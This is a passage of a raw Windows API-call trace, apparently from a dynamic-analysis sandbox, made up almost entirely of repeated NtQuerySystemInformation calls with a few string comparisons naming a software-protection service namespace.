(SystemInformationClass=0xb9, SystemInformation=0xc751dfcb20, Length=0x50, ResultLength=0x0) [0273.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x28, ResultLength=0x0) [0273.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0273.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x40, ResultLength=0x0) [0273.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0273.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d8, Length=0x30, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x38, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.787] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0273.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4a0, Length=0x20, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc420, Length=0x20, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x40, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcad0, Length=0x30, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d8, Length=0x30, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x38, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.801] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0273.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.810] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x50, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.817] NtQuerySystemInformation 